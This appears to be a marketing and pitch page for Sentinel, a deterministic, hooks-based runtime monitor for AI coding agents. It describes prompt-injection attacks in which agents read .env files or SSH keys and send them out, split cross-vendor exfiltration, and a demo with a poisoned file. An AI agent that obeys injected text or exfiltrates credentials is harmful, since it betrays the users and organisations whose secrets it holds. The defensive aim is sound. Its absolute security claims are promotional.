Runtime Behavioral Security for AI Agents

The pause between intent and action.

Agent threats live at the semantic layer — which tools got called, which files got read, whether behavior matches stated intent. That's only visible in-process. Sentinel ships as a hooks-based SDK that enforces deterministic security checks at the moments that matter.

"The thing protecting you does not inherit the failure modes of the thing it's protecting."

No tokens No external API No LLM in the monitoring pipeline $0 runtime cost On-prem by default Policy-less out of box

Attack Demos

Runnable live. Not slides.

Checkpoints

Deterministic hooks across every agent action

SDK Modules

Cross-vendor. No platform dependency.

Runtime Cost

Fully local. No tokens consumed.

Architecture Validated By

"If I had spare time, I would build that."

— Director of Engineering, AI Security · Palo Alto Networks

Every existing safety tool is either locked to one vendor or built on the same AI it's meant to protect. Nobody has built an independent, cross-vendor, deterministic agent security layer. The company that does owns the governance category.

// The Problem · Three Failure Modes

Intent Drift

User asked. Agent did something else.

User: summarize this code
Agent: rm -rf ./src

No vendor's safety layer can compare intent to action. The platform never knew what the user asked for.

Boundary Violation

Agent reads what it shouldn't.

.env · ~/.ssh/id_rsa
/etc/production

Each vendor's safety ends at its own session boundary. Anything outside is invisible — and exfiltratable.

Cross-Vendor

Two agents. One attack.

Claude reads credentials.
→ 30s later →
Cursor exfiltrates.

No platform sees both halves. The attack lives in the seam between vendors that don't talk to each other.

// The Architecture

Policy-less by default. Four deterministic checkpoints.

Sentinel ships policy-less out of the box. No YAML to write. No rules to configure. Behavioral baselines do the work — Sentinel learns what normal looks like and flags what isn't. For teams that want explicit control, a single YAML file adds custom policy on top of the baseline. But the default state is zero configuration beyond install.

Hooks block, allow, or guide. No probabilistic classifiers. No LLM judgment calls. Deterministic enforcement at every checkpoint — the only architecture that can make a hard security guarantee.

"A security guard that can be talked into unlocking the vault." That's what an LLM in the security pipeline is.

pre_prompt

intent capture

pre_execution

action gate

post_execution

drift detection

mcp_call

tool boundary

Agent runtime · any vendor

User prompt

stated intent

↓

LLM reasoning

decides tool + target

↓

Sentinel · deterministic enforcement layer

pre_prompt

Intent capture

pre_execution

Action gate

post_execution

Drift detection

mcp_call

Tool boundary

Behavioral baseline · rolling window

25 sensitivity rules · optional YAML

↓ ALLOW

Tool execution

file · API · command · MCP

↓ BLOCK

Enforcement escalation

restrict → quarantine → audit

No LLM in the monitoring pipeline · $0 runtime cost · append-only SHA-256 audit trail

// Deployment

On-prem by default. Your infrastructure, your keys, your data.

Sentinel runs entirely in-process. No data leaves your environment. No external API calls. No cloud dependency. BYOK — your team pays infrastructure costs directly to your LLM providers. Sentinel never touches your keys, your credentials, or your agent data.

On-premises

BYOK

Zero data egress

In-process SDK

No SaaS dependency

Enterprise security teams won't trust SaaS with security data at this stage. We know. Sentinel was built for that reality from day one — no hosted component, no data retention, no sub-processor disclosures required.

// For Security Leaders

What Sentinel actually prevents.

No code required to understand this section. If your organization is deploying AI agents in production — Cursor, Claude Code, internal LangChain agents, MCP tools — here's what changes with Sentinel installed.

Credential exfiltration

Agents compromised by prompt injection read .env files, SSH keys, and production secrets — then POST them externally. Sentinel blocks the file read before it executes. The credential is never seen.

Cross-vendor coordination attacks

Agent A reads credentials. Agent B exfiltrates 30 seconds later. No single vendor sees both halves. Sentinel monitors all agents from one layer, regardless of vendor, and correlates behavior across the fleet.

Intent drift

"Summarize this code" becomes "delete the source directory." Sentinel scores every action against the declared task. When alignment drops, enforcement kicks in — before the destructive action runs.

Compliance audit trail

Every agent action is logged to an append-only, SHA-256 hash-chained audit trail. Structured for SOC 2, GDPR, HIPAA, and EU AI Act. When the auditor asks "what did your agents do," you hand them a report — not a shrug.

Deployment model

On-premises. In-process. BYOK. No data leaves your environment. No hosted component. No SaaS trust questions. No sub-processor disclosures. Your infrastructure, your keys, your control. Sentinel installs as an npm package and configures from a single YAML file — or runs policy-less with behavioral baselines active from minute one.

// The Numbers

80%+

Attack success rate for behavioral control traps across five real agent frameworks.

Shapira et al. (2025), cited in Franklin et al., "AI Agent Traps," Google DeepMind, 2026. Web-use agents driven to exfiltrate local files, passwords, and secrets via task-aligned injections.

4 of 4

Sentinel detection layers caught the attack independently in live LLM demo — real Claude Sonnet 4 agent, poisoned file, no scripted behavior.

Side-by-side comparison: vulnerable agent (right) vs. Sentinel-protected agent (left) running identical prompts. Vulnerable agent reads .env.production and POSTs externally — three consecutive runs, consistent exfiltration. Sentinel blocks at every layer independently.

48%

of cybersecurity professionals rank agentic AI as the #1 attack vector for 2026.

Above phishing. Above ransomware. Above supply chain. The attack surface grew before the security layer existed.

Published NIST AI agent security standards.

No finalized standards exist. Companies who build audit infrastructure now arrive at compliance ahead of mandate — with 12 months of data already in place when requirements land.

// Deadline

EU AI Act — August 2, 2026

Automatic logging required for high-risk AI. Penalty: up to €35M or 7% of global revenue.

// Market Signal

Palo Alto Prisma AIRS 3.0

Announced at RSA 2026. Agent security is now a board-level priority — the window to move first is closing.

// Why Existing Tools Fail

01 — Vendor-locked safety ends at the session boundary.

Claude's safety layer knows nothing about what Cursor did five minutes ago. Each vendor protects their own surface — and most enterprises run more than one agent. Cross-vendor coordination attacks are invisible to existing tools. Sentinel monitors all agents from a single layer.

02 — LLM classifiers inherit the failure mode they were built to stop.

The dominant approach runs an LLM to classify whether a prompt is dangerous. A prompt injection that gets through the agent also gets through the classifier. You're using the compromised surface to evaluate itself. Sentinel has no LLM in the monitoring pipeline. Deterministic enforcement cannot be prompt-injected.

03 — Sandboxes contain blast radius. They're blind to intent drift inside the box.

Sandbox tools give agents isolated execution environments. They cannot tell you that the agent inside is doing something different from what the user asked. A monitoring tool is a security camera. Sentinel's pre_execution hook is a locked door.

04 — Policy-based tools suffer death by a thousand cuts.

Traditional security products require manual policy configuration. Policies get out of date. They require constant maintenance. They create friction developers route around. Sentinel ships policy-less by default — behavioral baselines do the work instead of manual policy management.

// How It Works

Step 01 // Install

One command. No account.

Install the SDK from npm. Fully local — your data never leaves your environment. No cloud signup. No procurement cycle.

# Install
$ npm install @tuent/sentinel

# Initialize — policy-less, behavioral baseline active
const sentinel = await Sentinel.init('agent-id')

Step 02 // Run (policy-less)

Sentinel observes immediately.

25 built-in sensitivity rules block credentials, SSH keys, and system files automatically. Behavioral baselines build over 30 days. No YAML required.

# Sentinel learns what normal looks like.
# No policy file. No configuration. Just install and run.
# .env, .ssh, /etc — blocked automatically.

# Optional: add explicit policy when you want it
const sentinel = await Sentinel.fromPolicy('.sentinel.yaml')

Optional — when your team wants explicit control:

# .sentinel.yaml — single file, full configuration
agent:
  id: coding-agent
  role: AI Coding Assistant
policy:
  allow:
    actions: [file_read, file_write]
    targets: ["src/**", "docs/**"]
  # .env, SSH, /etc — blocked automatically.
enforcement:
  restrictAfter: 2
  quarantineAfter: 3

Step 03 // Enforce

Register hooks. Block before execution.

Hook into any checkpoint. Sentinel evaluates the action before it executes. Violations escalate automatically: restricted at 2, quarantined at 3.

sentinel.on(agentId, 'pre_execution', (ctx) => {
  // ctx.evaluationResult → allow | block | guide
  // Behavioral baseline handles the defaults.
  // Add hooks for application-specific policy.
})

// How Sentinel Compares

Three things enterprises actually do today to mitigate agent risk — and where each one stops working.

	Claude Auto Mode	Sandbox (Docker, E2B)	LLM Classifiers (Lakera, etc.)	Sentinel
What it does	Ask-before-acting approval flow within one vendor's agent	Isolates agent execution to limit blast radius	Scans prompts and outputs for malicious content	Wraps every agent action with deterministic hooks, cross-vendor
Cross-vendor	No — Claude only	Partial — per-container	Partial — per-model	Yes — one SDK, all agents
Sees intent drift	No — no comparison of intent to action	No — blind inside the sandbox	Partial — prompt-level only	Yes — scores every action against declared task
Blocks before execution	Sometimes — approval fatigue bypasses it	No — contains damage after the fact	No — scans at submission, not runtime	Yes — pre_execution hook fires before the action runs
LLM in security layer	Yes — LLM polices itself	No	Yes — inherits prompt injection surface	No — fully deterministic
Behavioral baseline	No	No	No	Yes — per-agent, 30-day rolling window
Deployment	Built-in (vendor lock-in)	Infra team manages containers	SaaS API — data leaves your environment	npm install. On-prem. BYOK. 10 minutes.
Configuration	Vendor-defined, limited customization	Container policies, network rules	Hundreds of rules, manual maintenance	Policy-less by default. Optional YAML.
Runtime cost	Tokens for approval flow	Compute per container	Tokens per classification call	$0 — no external API, no tokens
Audit trail	Vendor logs only	Container logs — unstructured	Classification logs	Append-only, SHA-256 hash-chained. SOC 2, EU AI Act.

// The Secret Sauce

Every competitor builds the observation layer from scratch. Tuent already had one.

Sentinel's enforcement logic sits on top of a complete behavioral observation engine — session classification, deviation detection, rolling baselines, cross-vendor data model. That engine was production-tested on human behavior for months before it ever touched an agent. Porting it took two weeks.

That's the moat. Not speed. Not a team. An observation foundation that any company entering this category has to build before they can ship their first line of enforcement logic. By the time they have it, Sentinel has 12 months of behavioral data inside customer environments.

Test Suite

1,108

SDK Modules

Sensitivity Rules

Built-in

Time to Port

2 wks

Humans → Agents

// Founding Story

We spent months building a system that watched developer filesystem activity and rendered behavior as a living data structure. We thought we were building a productivity tool.

A semiconductor executive deploying AI at scale interrupted a demo fifteen minutes in. The same observation layer would work on agents — and no one was building it. Companies that rolled out Cursor or Claude Code had thousands of agents in production with no behavioral monitoring. The existing tools were either vendor-locked, LLM-based, or blind to intent.

"The same observation layer would work on AI agents — and no one is doing it."
// The founding moment

Best friends since high school. Second venture together. Roles swapped. Charlie built the core codebase — hooks engine, evaluation pipeline, framework adapters — in three weeks. James leads GTM, business development, and partnership strategy. Same team, different seats, sharper the second time.

"We're not asking you to bet on potential. We're asking you to bet on the second rep."

// Why Free Is the Right First Move

Enterprise security is bought top-down: CISO mandate, procurement cycle, six-month deployment. That requires the problem to already be board-acknowledged. It isn't yet — not for AI agents.

The way this market gets built is bottom-up. A developer installs Sentinel, hooks their agent, and has enforcement running in 10 minutes. They demo it in a PR review. The team lead asks for shared visibility. The VP Engineering asks for SSO and compliance exports. The enterprise deal closes itself — and by then, Sentinel has 12 months of behavioral baselines no competitor can replicate without starting over. Sentinel is at step zero of this motion. The free SDK is the entry point.

// Phase 01

Individual Developer

npm install. Hooks their agent. Enforcement running in 10 minutes. Free, no account. Policy-less — behavioral baselines active immediately.

Trigger: demo in a PR review. Team sees it working.

// Phase 02

Team Lead

Asks for fleet visibility. Alerts in Slack. One dashboard across all agents.

Trigger: second agent incident in the same week.

// Phase 03

VP Engineering / CISO

SSO, compliance exports, policy repository, SLA. Procurement opens. Deal closes itself.

Trigger: SOC 2 audit, EU AI Act, or board security review.

// Pilot Structure

Free pilot. BYOK. Clear boundaries.

Customers cover their own infrastructure costs via bring-your-own-key. Clear data disclosure and LOI required. Minimum 1 month for meaningful evaluation — enterprise cycles can extend to 6 months. Pricing flexibility matters more than revenue at this stage.

// Sales Cycle

Enterprise security sells in months, not weeks.

Sales cycles of up to 6 months are typical for enterprise security products. The free SDK compresses the bottom-up adoption cycle. By the time procurement opens, Sentinel has months of behavioral data the buyer can't get from a fresh install of a competitor.

// First User

Director of Security Engineering or Head of AI Platform at a company deploying AI agents in production. Trigger event: an agent did something unexpected, unauthorized, or destructive — and leadership wants to know how to prevent it.

// Why This Compounds

Data Gravity

Baselines are the moat.

Sentinel gets more accurate with every day it monitors an agent. Behavioral baselines built over 30 days catch deviations a new deployment misses. Switching means losing months of behavioral history — and starting blind again.

Regulatory Tailwind

Early movers win compliance.

EU AI Act deadline is August 2026. NIST frameworks are coming. Companies running Sentinel now arrive at compliance with a year of audit history already built — for free.

Architecture Advantage

Determinism can't be retrofitted.

LLM-based competitors cannot remove the LLM from their pipeline without rebuilding their product. Sentinel's deterministic hooks were designed in from day one. That's not a feature gap — it's structural.

// The Window

Now — 2026

The breach window is open. 88% of orgs already report incidents. Standards don't exist. Monitoring is sparse. Companies who deploy Sentinel now build 12+ months of behavioral baselines before compliance becomes mandatory.

August 2, 2026

EU AI Act automatic logging requirement activates. Penalty: up to €35M or 7% of global revenue. Sentinel customers hand auditors structured compliance reports. Everyone else scrambles.

2026–2027

NIST standards formalize. Market consolidates. Enterprise buyers standardize on 2–3 vendors. Developer-first tools with the deepest behavioral data win. Baselines become the product.

Too Late

The breach that sets the precedent. One high-profile AI agent incident changes every procurement conversation permanently. "Why didn't you have monitoring?" has no good answer.

// Recent · Last 30 Days

Apr 27

Architecture validated by Director of Engineering, AI Security at Palo Alto Networks — confirmed on-prem/BYOK, policy-less UX, and CISO intro pathway.

Apr 26

BVA pitch competition submission shipped — deck, video, teleprompter script delivered on hard deadline.

Apr 15

Shipped hooks-based architecture per advisor recommendation — replaces wrap middleware with deterministic checkpoints.

Apr 11

Sent comprehensive Sentinel technical brief to Director of Engineering at top-5 enterprise security vendor, who manages 3,500+ developers on Claude.

Apr 09

Tuent v28 brand and product system shipped — editorial discipline, code-native lockup.